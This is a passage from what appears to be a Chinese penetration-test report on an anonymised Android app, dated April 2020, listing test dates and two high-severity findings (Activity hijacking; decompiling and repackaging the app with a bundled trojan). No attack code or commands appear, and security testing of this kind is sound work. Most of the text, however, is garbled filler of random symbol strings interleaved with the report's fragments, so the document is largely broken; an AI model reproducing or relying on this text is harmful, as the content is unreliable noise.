+ j' j' @( e! [+ E1 t
+ \7 Y1 V' F* [: G: r; J
+ ^4 g' j3 u8 D# I6 |$ k) B& v) V" {1 ^# a
) Q" z6 P/ k/ Q% i4 z* B/ m2 J% @+ E8 F& h8 q( M9 s
% n* J6 M% Z. K3 b
$ `% Z$ h7 v+ X- |6 Z* _" E & ~- |! ?" [* W. R. P& j; m
2 x6 a0 {/ |. ?) } # A( D) f$ |: E& c& N! D
2 \- L/ g5 D+ r: a
文档编号:
# S- o5 q* l# Z8 ^& W m3 x
; _" N: u' U2 K5 t
6 P& `' z9 W! m7 z7 o# B
2 G+ |; Z6 y0 C1 F g ! R3 L' i( O' x$ h# Y. i) O
' S2 Q+ y3 E" B# H a, c
7 r7 ? k$ ~/ [8 L3 Q8 j: B7 l. a" {
! x6 G- k# D* D$ N) _: p2 S1 c# K
2 h0 p1 M+ y% B+ I( \5 E
% [, X' z$ r5 `9 R
, x* g- H+ u. C , d6 M# T( V+ i0 B8 I
6 r& t+ x. N; G4 S4 l/ N
8 I, L, B0 G( e" S0 `' c8 Z. @
! r" G) I% Z8 _/ z+ {
' \: ^6 m( }- K L0 m" V
/ g/ l7 r& V( p6 P* |" |
% J: L, [( W6 K5 q8 I9 S8 Z- a6 ^4 @- ?
- o0 Q$ }6 b/ Y
5 e+ N' L, D: _8 d& V
' R8 N7 u7 a$ T# h4 y
" [8 q1 O! r Z4 S7 }0 a4 e- n
- g5 m$ e! J b6 S; m: J
7 L- I$ }, }1 s) g' ]( ^
# C# i- _: M K) ?" B$ z! k# G
4 [" M5 l' c3 N* a4 _" B N3 J 4 \+ {% |+ c3 _1 r' d: }& t
$ l8 q3 ]7 F- m8 P% _ 0 x, h+ m) u- y1 M) O
$ r1 d6 e$ N! J& L4 B
: t& b7 e* i; n* `
?5 h- c1 T: i! b3 ?- u* E+ T
* }9 o3 G; b T) R" f
. t. u$ }8 a2 D _9 G& _ 某某某APP渗透测试
2 o. D- d) I2 O' P, z5 ^4 a. q( y- _" M0 r! L/ z
- w% L. @9 [' K* N D0 Z9 o/ q& ^/ w! I2 j
1 ~7 r6 V9 i |" [
0 z x: I" E7 b% W
5 V) x& H6 n6 Y0 \ Q" n9 |% [
+ F4 R! r5 B/ I0 A1 K8 `+ Z4 x4 j
9 c5 \5 c7 m+ ~+ j, P
! p' l% h: ?) j5 O- O3 m& y
" s& Y' N( \6 e2 _/ U' I7 i$ m' X8 M3 t6 Z1 n1 J: W
6 Q( e1 [& W# C# \' V8 ~
* y/ T G$ L9 L* u
3 Z6 o1 q) ~) s4 ~0 {3 ~) K
! l8 A I3 i- ~2 p 9 F+ l; I; @! L0 T/ B) R8 D, i
2 F. H! i4 l. K6 C2 @8 ^% [
( ^0 E% Z4 f- p H% R
3 X( D8 z' ?; K: d1 ~# H4 W
! t$ L+ M% n; r, }+ C L5 {8 j* i7 N% ^7 C& J! ^
3 T6 Q2 L6 A+ k. s6 m. S% L" O
+ T! M8 F+ M. r- h0 @
6 ]" ^7 z2 s \% z
s2 N3 Y& T4 R+ ~% \/ {& L3 ?
" t+ @ p9 n, i+ v4 E" K5 t+ j @1 l" F r; k5 e6 ?, ~4 z
/ Z/ S* u) Q. t5 u; J: v3 A" |
6 D# U0 j1 r% y 技 术 报 告 3 D; x; K1 S, P) m% k1 h. a8 K
; d A6 z8 m9 Z& d1 q- O% {; j) g
( g8 t) J: e- `" D2 v$ Z
$ q) G; z5 w4 I) u2 w$ C) q: B4 J
. s! \+ r3 R; h
8 b9 H' Q6 x2 [( Q. U 2 T. k2 e5 U& b
. Q$ E9 a0 H d9 b# \- O
$ L. q8 G9 E7 G5 ]; ^ v, H0 Z: b( ~
3 M- V+ a- e T3 _. R: y ( W1 H5 I5 y$ m# e! W: }
- r1 ?" X8 h1 n( c
3 f% @/ w' ~; a6 S' ~' [
5 P, }4 m2 ] `2 j7 B
C! G0 u# ^1 x) N2 `8 F/ o+ g3 @) v9 ?# r5 E' y- D( H2 j1 r
) m8 l$ J2 W6 }. h) B2 |
) ]6 I, W0 T$ k/ D% V! R3 D
8 H) {7 s" o" H1 v# t4 y6 M$ M
9 a9 Q3 d; F( h0 N- C4 r% E3 d
5 s+ W0 b" U! {2 S( y* N7 M6 C
" I: M2 c/ |( p! N9 O) I3 a) a2 l$ x, h) j* q
2 S( `7 Y: e) o" e* h
9 e% q# M. L- z; `+ E6 V" a
* t* z9 ^; M0 L' M% g X ~
& g6 e$ `( F. s
/ ?9 f) |/ K$ X& D1 ? @7 `& y1 D" C$ f8 w9 {
8 x% ]# |5 |1 F- K
) _* h9 P8 u6 l9 ^) C7 H; k
3 d& O! [4 R. L$ y$ J! R0 }
( {2 W* E, D* h3 F) w8 i9 p ; j. q7 [# R" B* I; u3 T
% O8 V( l0 p n2 I
! Q: A W0 {1 R" u* d- x/ \
/ p5 o# t, Z. z# g9 k4 w
4 m5 V$ r' _4 N' u, q& [3 h
4 D+ ]! p% O- Z$ m( Z% A3 R& {# o
$ |& R n3 q7 y# U. D- p3 ~( d: t* n* c. v ?
) H- _ V. @& @1 [% P$ {. {) }5 o
/ f1 |7 ]* c' K4 @0 m2 K
7 a+ L4 `% ]% i0 Q7 q& i- i$ Z8 b. L3 Y9 J. V% H; F: k* C
5 o& b8 {; P" b! y8 s. c+ y& M& P2 G0 q
# M$ t+ p$ Y: M
' C6 V, o$ {2 C3 f3 p
) l2 H8 u" V5 D% {: a
6 _/ _1 S: L. _/ E: u9 p0 o* \7 u+ C8 x- o
# A% n" W! R: }5 a1 W) V, c
+ M ^' ? W7 W4 p9 V
8 c: i5 Q2 ]6 V0 X( H$ t f7 N# x- d) v% _, e- W' n+ U
$ y! u1 T7 X& x8 ^5 S0 Z+ \' ^- g* }* J' T) [& i
" H! M' J. F3 M& ]
/ R; p3 t; w! ^# d
+ A$ f" E4 n( a' I0 j D+ E A& G4 B$ B
' o0 Z+ H; K2 ^4 P% ~+ g
+ t+ r D+ o9 i ] % r/ X0 j7 A0 e
) j. ~" Y; D+ ^5 M3 y
2 b+ \. o5 S, h( ^! }: g4 O) Z
0 c/ Y5 F0 q: x1 }
# `( D" s, T. `' ?6 N) c
9 p4 f. B) s/ |
+ Q* \3 H8 N) l$ o9 c+ ?
9 m4 o: F# N& n; t1 K6 L2 @
+ e* k0 V! _/ ~, Z6 h6 U9 a. i# W/ b7 i, |0 D
1 B! f* v( v- ~5 }& v6 J* X5 n# ~
7 a' W1 q2 p! |& i' m; Y- I
: i. x# i5 x! U& I
, o% N j# k2 M) ~* Y2 r& i- [
2 `8 u+ v4 P7 q2 \2 i" E2 u5 t/ y$ k6 f) u7 a3 H6 T+ j
/ h" C1 G" B3 n& c, @" [6 c- [, x! B' k" m( ~4 V
8 ?( H& a. ^" F# g" M
2 W0 s" t2 O4 G6 r
% Q: P6 E: e; w/ M; ]- h& G
% q: D3 ~! R3 c& s, l$ W) w9 G& L
6 P# p* Y% x; o) |6 ]4 b2 C1 w
* L- r+ F6 {' L& r # M' C* [1 ^, }9 G! x7 {
* c* w4 J$ {3 Y* O- o4 N
6 Q/ u2 k% M7 Y1 Y1 a2 k
3 W* m- x# r: V
) u# a) R2 _/ M; Z/ G/ D
7 G+ k4 I9 y& W. D
( a, D, V% i: W* E2 Y* G
8 _( V3 b9 p3 @# R4 W: |9 _% ~ 7 J8 U- B2 o# _' x
0 Y5 Q" D$ `! A" {. T+ [- i4 k" z4 s
- L" ^' c! u9 L. ?6 L% c
) m2 Y, Z& J0 w1 z9 b. x9 Z
7 `& L) s5 T6 j1 `# D2 k! a3 [4 b' J0 [4 W) {& z
: T+ Z# Q* ]- g- e0 j' W' h3 g; E9 G3 s' G6 [4 g
- K0 t4 z0 L# @& E8 J1 U
6 g* n6 K" N. u
X( p0 Q5 v3 N0 |9 O, U& Z- }5 C
0 c' h+ a- J$ h1 e ' B3 @. m+ S$ C3 g2 N
) X3 `' {! O5 S
: `7 {! \/ U) E3 g6 Q9 }, ^4 H& o9 R9 d+ d, B
, [. i: N! K8 @4 a6 G: ^
+ [; `* O: k; w7 I% P 二〇二〇年
' {, N. F" r x" H" M5 a7 T- a5 h2 r& K0 D4 Y- Q
& y/ `4 D) G! i1 V8 c
+ r0 {0 v' e9 v* ] + D A% D) s/ m* c
H3 @5 X0 T9 `5 W7 O4 n! y
5 w% y+ {2 f' z# `5 r
# L- ~% b, w1 M* R2 ]) y( x, n, t 6 F' c, I' s+ U1 ~' [) M- D
# e- P( f& a8 m) @+ x
' v9 I9 ^- H: k3 I; T# E4 ^$ Y$ j S' j# l
4 P) U* _; t* ~! M. N7 W
# A# K* ~1 u. n* l9 Q$ ?
$ t I3 | O' X( a! g* M8 F5 m( g5 g' v6 m. j; N( k* x, E0 b
- U; i* {! T1 t# A. s6 M
; u. N5 F$ d. i" Q5 O9 b# f ; W. F5 i+ A6 Q
, f4 r$ n& z/ S: g7 H# F: D% r
- ~1 a9 }1 _( @) c/ a: R) {
% { i( g8 P0 D& I; | 目 录
# w. x' O3 v0 C2 Q: x# ^" n- g. h0 M
4 S" h. B( L8 V: _ }
2 c5 P. \9 ?- r5 Y 1 B+ M, K6 D( p2 Q Z$ O1 t5 j
6 R( M; `/ q5 \- W1 R% X
6 I& [, f1 Y; @! ?/ T' U
- [9 J8 [" V [8 n! f1 K* f' x6 d4 A. f6 J
- {# D& @( d* Z+ b- L* ^1 V8 a! b$ h3 t3 `5 l+ u! [5 e
+ X5 d1 f2 A6 k/ i8 d. {9 y }3 Y% h* z a4 h5 V' W- R
; R+ S* \5 m+ [/ o9 ~1 n/ D
8 r, ]7 A$ t! V7 m; z
1 概述... 3 ; p! @2 Q" h; C# M3 @# W
4 e$ f' `: G9 v1 L. n* P4 ^
9 s% Z3 s% z/ C! M& u" m% h; A+ t ]% h( Q N
! L7 a- H$ i, }0 f! r" c5 P3 Z& F! _ R; }* E; E% r
1.2测试时间... 3
' b4 t% H) W/ t6 j7 M+ r
- a6 U9 o4 O- W8 Z9 v+ A' |
2 B$ h9 b `0 x/ Q5 i) l2 E2 b' i4 `: R' `. i/ V n5 g# }
. m! I' s0 i! p- {: N7 G- M2 i
. X: o# r4 \. j0 | 1.3测试对象... 3
7 [! B1 y/ |. s. ?& a# R5 V! C0 J. E9 }
0 Z2 b' Y7 {8 o: r, o/ w4 y8 [! M
$ v2 j1 f! c9 ^, ^3 o
?' r9 D& I& n" w. e" t7 ~) @2 b0 S
8 I7 _! `+ I- l) o) Y% G 1.4测试结果... 3 8 ~+ R/ l+ G( P9 e3 |4 \! f
% @4 j* i8 R0 D, l8 q3 E
, x! z/ S0 W! u( H( L* F
9 S _0 p& W/ t; M* Y2 g2 `
: Y4 U6 b9 @% {& z* b0 b
3 G* i! z$ l- c, w- x$ L 2 检测结果... 4
; O# h- \. ?/ j' O* y
: R$ u X0 G7 _8 n
# y2 t6 ~% \9 J3 p5 o7 ?4 l
# {( Q$ ?( w; g3 U
- w9 f$ |9 u0 L q3 N8 I- F' ?% N* r( u
2.1 某某某... 4 3 p$ }5 _- f" D8 Z1 }
5 ^; x L/ K1 f4 n& Q: ~4 t2 |
$ v2 ]: _% s6 [0 ?! m! u4 W
5 c' o# p2 [; P. V/ @( P ' c* i: T( s% r1 ]! ^; e
& O& p. ?, P+ Z
2.1.1检测目标... 4
, h+ I4 o* y: T' f) Z, w& U
$ g% H3 C/ i! k& M1 \1 _$ Q6 [
* B) S, y; ^8 X
$ b: a: y) r( N6 l$ D" Z7 d4 F 7 z" f: n4 l" \7 K% O
7 \/ I1 j3 r: p' s3 C' G 2.1.2检测结果... 4
- E) m2 r: i( z, ^$ J( _6 ?2 W) J( s* @7 L. N/ ?7 d8 v* O" C
; d2 x3 n" E) A
4 y& S# V% s; C G. w: ^' x
7 Y) S, a" x0 ]0 ]+ D$ z; Q$ U$ q$ z# \6 k, |
2.1.2.1. 4 ! J. g9 z) G f, G: e' Y6 @9 x
" k, f/ s; L: }& @
$ E3 B. g" U4 `8 A, i
* i, F! D( l [/ z' F6 F( W
- K. M2 k6 ]+ ^4 A2 e# s
8 @9 R! W3 V; h; k
2.1.2.2. 6 ( |! k4 T0 o1 C+ z9 C8 \
j# m& _: S# o' e0 W. D1 I: ^
6 J2 Z( Q \5 _& v
' z5 e9 W! R- j2 d# `, [$ W9 ~+ m8 n 8 S* S+ `/ {3 ]
' m2 N& Y1 v4 Y3 a! p' T
% ?5 j3 S, U- J0 q7 }) {7 e4 M
7 \! \3 D8 A& H( m# R4 o! O% O0 y, R
5 [# ?$ I' A) c( X6 n h
# X3 z q, X, ]4 u" z
1 q, u5 R _1 N- P& d$ ^
: r2 K4 o+ Q# l) Y4 v5 T ; X1 x" z7 H( _+ i: w& [ N
+ O; ~$ `# z4 j5 h
: q! k* H4 S# `! y" ^- F" T; `
9 q5 [" h$ b, j( b& x! |, _
; @1 M9 T! K1 d5 I9 j1 V9 Q* J4 b: Y" Y* Z( V2 E
9 a9 ?$ i! X/ s; x6 ?
% Y2 s- t' c- Y4 W& V- [% N& E
1 概述
7 ~1 e3 L) K. l# `5 F5 _/ @; J0 r; Q3 `" v# H5 e
9 R; P3 p6 D9 E+ ~
7 F; s& q8 g" e% h
& }" l7 y5 D: t
$ s( w; [. U# i 1.2测试时间
" h8 h) Q- e7 N& n9 u( o% O5 p) D" u& o' q4 m
, @' p6 j9 E S- K/ C. ~6 a0 T' `4 R
6 u3 Z* u0 Q+ i0 y% Y, N9 o 8 G- c1 o7 M0 r- i$ Y2 D/ U
6 H& g* o. D0 c/ D9 B/ P
; ^( ? |+ p( |& E3 k" ?
/ M q0 {! y) e# u) {
/ m3 v2 e+ \. r/ e3 {1 f+ X: j% L
8 a: E/ M0 g9 ^. @& V |
# h5 d$ b7 N. x0 ~0 b$ b/ k. Y4 w' Z$ X+ W7 F& F+ q' u
( T: ]: Z9 _9 g' f3 l: C1 u+ J" J
4 a& G* C8 y) S) ]4 |" @" M 渗透测试时间
2 m# S4 } c, k+ f9 U6 b. P& a. K; I- n# w$ k% O5 y, Z4 S0 l3 Q
0 j2 a9 f x2 s# R y5 I
* q, F; S1 N4 z, J" o/ y |
; k+ Y0 v& |- M7 I1 [- p
7 k5 D* D3 w* O
, V9 Y2 P; z5 z; E+ }/ ^; `- ~# z
& m) E7 N& P6 n( U* M$ S* d
8 ?, s) X9 N1 o4 G2 o! a
" x, K( M, Y1 V& ]$ K |
& i; s+ G6 x& X9 K& o0 w% u) Y- K( h1 ]" }+ C8 k2 p" s3 l
! x* o6 h! I) ?7 E5 J8 ]: I- f) Q* L
. e) v/ {/ {( k 起始时间 & Z- o; U* I/ P
. T3 h* a5 x6 E& \% i+ w1 D 8 K/ C' b# G5 k# g2 o
6 J* B0 R0 P. P4 ^
|
% C# Z# b( I/ ~: r, @( C$ G$ w# \: ~! O' a/ j1 d" K0 S4 c
" m* h2 k) M7 `3 G/ G. Q5 S; n
) U9 i9 r! b! V! l: Q& c9 O
; Z* ^1 B [6 Y' s& x" [; d& D8 V7 _$ u$ ^$ @! q9 S
2020年4月6日 + }( B; j: Q& f. t- q- { n( Z: w& [
8 Q6 x- o: o; X& q/ v$ {4 Y' |
9 z3 p+ D+ } B+ `) ^# p4 g
& H1 h% y- Z$ } |
2 ~ |/ h) J& k: |6 v; `/ B# u: \! J+ U' _3 V- E4 `
1 ^3 B: A$ P% m# p* }; @
' J4 Y; s6 g& O1 g ( f- K; J3 g0 \: M
& a1 w8 I7 d; Y
| 0 J O, F; q9 G. w; L( J
A# V/ x3 B: k! O0 z/ A# ^1 p f' n C# X% o* n3 d
) X/ G; k J# G4 Y+ ` 结束时间
5 x2 o; F8 c; f# w2 [7 _
4 X# {6 h" P P1 f8 U- |
( H$ ?: M, c' h1 b0 _2 _: F! E% k
; c! C- q& A' j" F5 \. k* F |
, h/ t7 O$ P' P2 D; G* ]( E
2 {( z% h! X4 B- J $ C9 I+ K: [$ U9 m$ k; ?
1 \, q; m. M: a; M5 t * E/ n, N' ]1 J- C7 R; r6 C4 k
4 r8 N. V/ t) G0 a4 e& z: v% ~ 2020年4月9日 7 v% S! V' U4 S2 j) N$ X% u& J
: n% ]" H! c, A4 u; c 1 f7 [% _3 T' n8 f# |" Z
' p" f1 B7 B) d8 C Q
|
- j) l: f$ A- T! a; w B6 w3 b! _
5 K! I8 T2 g6 L, N1 b
! [4 c$ W0 v" U0 Z8 K
0 d! w, s' t. F4 L# _: q) e- ?, ?3 J. V( S. l
2 y1 a* N" b2 o- ]# k: N' e8 j) T& A4 c! _5 F
- q1 ?- h5 X( {0 v7 [% l
) U- P' W$ M8 ]) h$ O* V' T6 t3 e 1.3测试对象
$ p- U6 y' J N) V* o
- ~6 U0 m: T, f$ X% ]
: R1 i% g; i _
& b$ Z; L. S1 P7 O, C" @
* V j; d3 H" ?: E: u4 n6 K
* Z7 o/ L# E4 S7 j, w( G6 E 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
) O @+ {/ z- P) i( P1 b7 c
/ J" F1 P4 Z4 X# f$ Z' B5 d- v
3 ^5 r- D* E7 y/ x& w h% N! r A5 L4 v% L" n1 L6 E
' D" v9 M/ ?% m$ K1 b/ M! I4 A- c
9 n( f: l) B. ]- ?! H2 ]! B+ M# B# H' } 表1-1 检测对象 ' l4 H: U$ k, m# J3 l) F5 d9 h
9 ^9 m( h+ b1 w( T' O! G" m/ u
# y: K: O3 Q/ T, x3 @4 e+ e3 l$ l6 |1 O' _2 Z, v: ?$ ]" R
1 K0 y, T" ^4 r; M
& z$ e# I$ E7 x7 z K " C, b- G% T0 P. t0 R
6 I, { C3 U. G. ]1 |
3 W6 l: Z6 R+ x8 V+ O/ }/ {% l- T1 m3 ^% D- g" K
|
. ^0 a' Q! n, U; Z- d, ~: \1 M5 K2 U3 A" n
4 T( j" d! }: m$ a8 K0 M& g; h
* K! T7 h* |3 G' F Y1 p
序号 . |5 U! z! e8 E8 {5 F; n
& i* g2 t# m: d4 t1 H% l 1 p2 u. C; O- Q* }" L- t8 C7 F
: h, Z4 H/ ~+ N1 Q4 m; q0 j, N |
: ~3 o! Z) q" {+ b% k" i
/ C" _, _& `+ U3 w( s9 g7 z 0 ]7 z7 E7 o; b2 R9 Q. q) y
& o: a8 M9 r: F8 C - Q2 X" o% v& F# P: n
; \3 q0 S7 b5 C+ ?2 w. D/ C 测试对象 0 N( [) d; D/ R5 _ q
- n2 i/ N( B$ s ; W9 t, S. I9 U
# @% A$ t& [: ~5 m
| . c# r; }" a! ]
2 e8 S9 H0 `) i
7 [# T) g$ a- `% p; F E
7 W9 N1 r( M8 W
* `8 t6 b. n/ ~: g; T# g7 \; {
1 [. t% Y) F% y/ ^. s! ^% o, i 测试地址 % h% \) u7 \9 Z
2 H* C6 V& S5 M9 F# f5 U, R9 {
- ]; K4 z: I7 u, T& A6 g
; i: ^7 g5 e) V: H# a |
* r6 H) H6 B, N( t% O3 \5 c1 X% s: t; T7 H7 d
) q) x- Y$ w6 z, n3 o
5 ^+ Q8 `2 n7 @
L" d6 g+ C; Q9 y
3 B8 ]) E ^8 b
安全漏洞 ' v; u6 V& ~ R
/ X2 D8 `- Q8 g% V& ]; X1 e " J9 B! d7 X) U0 V
& m1 k6 m' `) Q& p' c* R |
: N, ~5 T2 C# |9 z$ c; B$ j9 @6 M( O/ \. E
8 k$ J, L5 `( _4 N$ G; \
9 U$ K {; F7 j8 ]# s
* ?: {5 G$ N" M0 f+ a! _: A* O# P r* g) ~8 V
| 6 G( Z7 y& z: }- n& m# V
) O% k& Z+ x/ s" z- ` # _/ A& G0 v+ i3 N/ n% A' X
" n% c) F# Q& E9 L J) ^
1
) F% x0 [2 i( j7 V6 t; ~( r
* c6 P: b* q: J* ]0 i, _1 H l2 W3 R; q : P. D9 k# k* t. S
& j. n" V" U: G1 z3 p
|
1 J4 e3 e: e+ v4 A2 O& {' u- H: i% Q1 L$ C+ h
# L: ?$ u# g6 ~; [1 L8 T8 ^1 u6 p! c v
1 G( @& d" C) K: [) ~ L5 _
3 G! ^; |( S8 t! x' s3 [ 某某某安卓APP " s' f" l) l- R6 Y# I$ I
% H# T' J6 X5 I; E9 B0 B1 {
% ? F7 P/ S; G, a- `/ }, ~0 o
" ?4 o" X) e! ?2 P1 i3 B L) E( m- @ | & Q5 U/ l. ~) {+ s1 g
, d# e& L6 U3 F5 q s ' E/ w' [" K( V9 d( S
0 a( V+ }9 s; Z4 p
0 ?& s4 c2 u! x$ x# C7 A. ^* e9 c" t, P' {; ^3 x
3 N: g8 [2 N$ Q1 S$ }; Y
Y, k( K, j4 y; \7 _
" e: s$ {7 |4 g/ g# \/ E; L
" r P/ E* k& Z1 ]3 ^
| - \! L0 z) V2 R/ w
/ R) R$ x. J# \0 H8 u1 R2 j& N
/ f/ ^% w, `! N( S+ G) z) V$ i
# l, V- ]* h& x 7 d. M' L: K! d1 _7 r- K+ G
. f& H0 D- E. a3 G7 E 2 / c! A6 [" X; C: k
' ?- f" E: ]' m; Z
7 ?: E" k9 A$ ?6 [4 ~+ @ U0 J0 z8 j) B+ g
|
. q. f9 e0 n9 o5 j1 @( F1 B9 Z6 b ~! A* ?( h$ w8 e. R8 Q6 l
0 ]+ o; y5 ]0 `) m7 m4 F
# [" L; E6 b; R4 {$ _3 H9 ~* y
7 S) w, R+ G' H) f. d- d {5 D* T, g
6 j3 w' W! Y: G1 C
4 \6 }" Z- _/ S9 [+ O: P
5 e3 x: E0 x$ v9 X# U7 L. _- @9 [: I# s- ]& W
1.4测试结果
- `0 e( f2 X$ e6 X5 R
4 G# q/ p9 D1 U
3 {" t+ ^3 ^. D6 ?
' ~. c3 r. G! l {7 _
$ w( Z) [: A. y9 u1 w$ I; V( s
% ]2 u! S' w+ g: ]" O8 d- f$ L/ F 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
# g) K1 }+ ^ S5 {5 c% p" U- i7 M% o0 N D* H- E ]- r
* @9 ?: j; c8 T1 J1 e0 [
: z1 \6 N1 A3 i. `* K
8 ?* M" G4 N% L% \5 W9 @% t7 q2 i0 S/ s3 x& D
+ z* ^' x0 f2 X& H
- Z, b$ {8 u% f8 |! s M
3 J2 G% k4 A8 R: V
* ~3 x5 k+ J. g0 j/ }2 E1 d+ ?) _ * S5 D1 ~2 z# i: C1 y; e
0 R; P$ a# l/ ~! H. l % @, g; `: l2 x1 I# _
' z( R3 D3 \2 P& X7 P9 c
/ V% h8 N; e$ [- q! p9 r1 i3 [; _. X/ C V! c6 `
, F7 ~+ }! W" K9 w/ C$ W5 s/ J- ~' a M
|
/ U; B' v9 Z7 Q" z8 \; y8 y& u, l) F; H' [9 {3 L& B1 k, r
+ ]6 M6 i/ e7 A6 r1 M6 f
( n0 V1 Q3 ]& x* a+ i, r- X# \
序号 ( _( H; d3 w) ?) |
" D- G3 v* j5 s/ ~+ r/ F7 i& {
4 A" s' \! x5 |! L9 x
( T, G [* P7 T6 D" `8 p) q, j |
9 V' B) B2 ?2 a# q
# D% y k" g, S9 g. }% M( @) A $ `, ]8 \, b7 Q
# Z! A) c# p }9 j' r' Q0 V9 a
. n+ Y. w( v& x7 H+ B1 w7 e5 \# ^$ M% M% C
系统名称 ; @, V) }; W1 r. P" o
8 j( |9 H5 s. { 4 ]$ V9 D/ G5 Q" n8 K
" c) w5 i+ @, r: {% D
| 0 @$ u) L! W! i D1 E% K
+ _' E/ v, D2 G6 [# V
! Z- B0 i0 ]/ O, n6 N9 s
% K' T7 r- H h6 \5 G2 b5 @ 9 r- C: ?+ E) ^% Q( S" |* s
6 V- X! w; c3 H% f8 `9 ~ 漏洞名称
! i( y4 {; a' q n2 s1 t) H; c8 A9 }
/ W* q* e) R* w; v
- u E8 A5 v- Q
| 7 x8 y6 S2 l7 ?
( C( x0 V' w/ ]: b" l; a % V. V, o$ o$ F. [6 `
: a5 j0 y9 l$ W3 ?. C* O
! a2 M9 W1 h/ C% j; h ]1 u8 h8 S$ H. @; ? m* X! R
漏洞危害 4 B1 c2 |% I" V3 x" c( T' j
; s1 F0 v& p, k. }- F ' K, h- O7 l2 J" i% x* s5 d
' B9 F+ d) ?% W$ p |
2 {5 t; f; V6 u; p4 L7 C- y! B2 ]1 }
# o6 m' j9 A+ L* G% ^6 O
: @, `) s' ]3 D& J' r. T' T
1 R: P/ v) h% z4 N1 R+ j
e2 M v5 a) w! Q2 T' l" Z 修复结果
5 o3 a! v# Z, X, R. G. V, ~* d8 W; H1 ~% P* k
0 M! ]5 ~ Z* _
: H* ~4 Y; Z& q0 v: Q: Z
|
1 x4 }8 X& F" f- y Z/ o0 S
' ~2 t% B# d) y/ j7 \2 {
( H) O1 J, g/ ^* R1 S- Z: P$ _" {! O- A7 M2 W2 ]$ t+ j$ }8 s3 C2 P% Y
9 z# @$ |. W- ?. V* [ ]; p* N5 G, w: f
| 7 h, ]. ^: q# P9 u& e: X
0 v- I- [9 V* p3 H a0 S# K4 E: y
( b7 A5 P; Y) x" q/ H; p; Z
# V) I) g S# L0 U: Z' x 1 : j$ V) a9 R- s" M* \! M4 [
! K6 \5 |* P0 X: t
: n2 {. p7 K# i, F+ L3 [' W5 u3 k! D/ y. N" T; a
| ; R' ^# P# s4 y0 h7 _4 @
) |7 Q) F: W. c% j# `
2 q+ Q+ q. q' i9 E3 S9 E. p( ~8 l5 j5 X( L
2 G1 ?% f# v L+ X6 y0 L# g
5 K3 T" q* ?/ J 某某某某某某APP $ j2 Y% R3 i2 m$ y
+ @7 s/ n0 ?8 E" O8 t/ I6 k
( m2 s6 X% x9 |# N7 N m' a# G1 i9 X2 a! X, t1 b& E3 g& H
| # r" t, F" B5 d' B
0 W1 h& B7 m; ^- [2 x( H U
5 B+ ^' j* |9 n4 k M5 ]# q2 z
, N/ s$ U) J* F& j- d- O) }9 j: G
+ Y" b: ?. E$ p" {5 |* }4 B" H* m+ |- a2 l6 I
Activity 劫持 " W5 o9 }$ u4 A5 h8 u, {
% i. B7 ^: c/ N, _ 1 B, m: W+ u9 C( n
& b+ i2 w# Y1 K. B0 L2 t
8 T3 _! `+ s# ^" a9 G8 D9 I9 b- _) m6 k+ C1 ?/ {( d. T, Z
$ Q1 i! v5 m+ o7 K
p j$ M& G4 x {) ?
' d3 W' U7 E1 c# i! V
. i5 w z6 F5 @ |
. Y9 E3 z* ?' P2 a4 Q0 N2 E' p) Y
# U( X" K) S( ]$ L, `" D
& S1 X& _) E; K, {2 X( V: F$ {
5 k8 a6 ~; u* R# E& i! t# _) c/ v' i, [" [6 g* P
高 ) L% b0 B/ T7 O8 c- p; N% s
# F) T( L1 W6 X1 k3 h2 u
8 Y0 @. S$ {6 Q; @
) [( p# K/ _) M, o
| . F) o" n7 H1 O4 `& N' z
/ v& ?; r( g% f4 t% X 9 M% l3 j v3 x, S n* [
5 C8 u J+ c# E- }1 k- B6 p5 G
2 T8 M; V( l' v
! |8 z2 A, |: Y N2 O) [: Z4 Y2 m
2 G* c( z! Y4 R8 \
n/ n8 n. m; O7 ~
: H, N; _9 t) O- v& x! P2 Q
8 m4 m' f& V. ]* @' s | % d! r/ @6 b/ _1 K- l
( o. f: d& W& g& W3 `9 g* ]
7 U2 x4 K) _) Q+ _% G% n- P
; ~7 u: N" U/ c% b3 A/ b 7 D% Q$ n" J7 U
! u- p& f5 G' | h% M z$ | |
% I2 H* a; x! W2 i2 N& g! g7 n% A7 c+ C6 X
& ~( A+ I0 ^. F9 n$ u% H( Q8 F( @1 |& L, |" ^* m
2
; g. O- n* f0 X8 z
/ n4 y7 P/ \# }. C( k
* ^' h" Z E* _- Z; i( x+ ~
G# c" e2 E8 J! I7 ]5 m | ; I* A o$ |( o" k
3 V0 U4 n& S1 a# }. `$ r, Z' e: ~ % W, m$ N4 f2 ~4 C( U4 B: D7 |
0 [1 S- [* p2 D
: v% X, A, H$ V$ Z# y w5 f9 s5 N t7 @
某某某某某某APP Y% H7 j- ]2 [1 ]0 }
2 W5 l& L0 b* z
1 P9 I7 |" j' Y
, ^0 f' g. |2 _2 ]. P0 T! z% q
| ' U+ P$ e' G: ~# Q- U
- O3 T3 @- o( C
0 r+ x2 B0 T5 d! I5 y. b. Z- v! M O$ [
' R7 i$ P/ i2 m9 b$ [
. z! b. L- A. @. Q& v, R
反编译二次打包捆绑木马、篡改APP代码
% R4 N% Q! W: R9 U6 l+ N
& r( P. g4 J3 _4 S% k
! _" k7 D0 @7 o1 E6 E* O. h) ~4 y" s2 d
| : L" _* k( H9 |2 ~- }' j: B
! S& r1 ^, Q4 y" a
; f, }- d E4 i/ Y( }: T2 j; D3 n* U6 ]# |1 b" F& Z6 C# [
# V+ R2 V$ A. J+ ?# X$ n& ^1 `9 j9 I+ Y( G
高
' s% j+ c4 J2 Y/ m
6 Z" E- w4 O/ `0 F
# S. Q U9 F% ? Q( ^( E7 n2 y3 C
/ W8 R) M8 w3 s | 1 p6 \6 Q! @$ f+ [
2 @9 p0 J3 ^, c1 x" a
. b+ |6 P& k/ P, I+ d
2 }0 K( D6 Y4 l
( p/ {, }8 C; L9 P( c5 z
4 M* C2 ~* C) D9 U5 Z: q6 D
: n6 a( c% z8 Y( E+ Z5 t8 r/ [" G: n/ J4 U
9 i$ ?4 |0 `- Z+ |% K
1 Y/ p/ J2 i0 l) [& E$ @ |
: T5 _& f u* H4 K: Z0 b8 p& G* p7 I' w! p
, @! `2 N5 C7 Q" `$ \8 p5 l) ]
! b* N# |+ j* J & c' E9 k6 q f! i% \
0 d c+ @0 }5 l( U- f7 U
2 x+ M$ P# y3 T4 \' o, ~7 X e( b4 V* Q6 w$ N2 y$ ^/ H4 z4 C
" {$ ?) Y* X; ?5 H% J; G
% L' e! B7 D: O! R6 K) c
- r2 T q+ e' F% D; A# P) j
% r5 Z/ D- ~+ L6 _, H
